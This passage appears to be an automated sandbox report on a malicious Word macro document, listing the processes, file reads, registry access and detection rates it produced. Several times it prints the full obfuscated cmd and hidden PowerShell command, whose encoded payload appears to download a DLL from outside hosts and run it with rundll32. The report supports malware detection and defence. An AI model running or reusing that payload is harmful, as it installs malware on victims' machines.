                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: ARCH_25_012021.docVirustotal: Detection: 16%
                      Source: ARCH_25_012021.docReversingLabs: Detection: 26%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090288416.0000000002930000.00000002.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: ARCH_25_012021.docStream path 'Macros/VBA/Gusca95luq_' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Gusca95luq_
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
                      Suspicious powershell command line foundShow sources
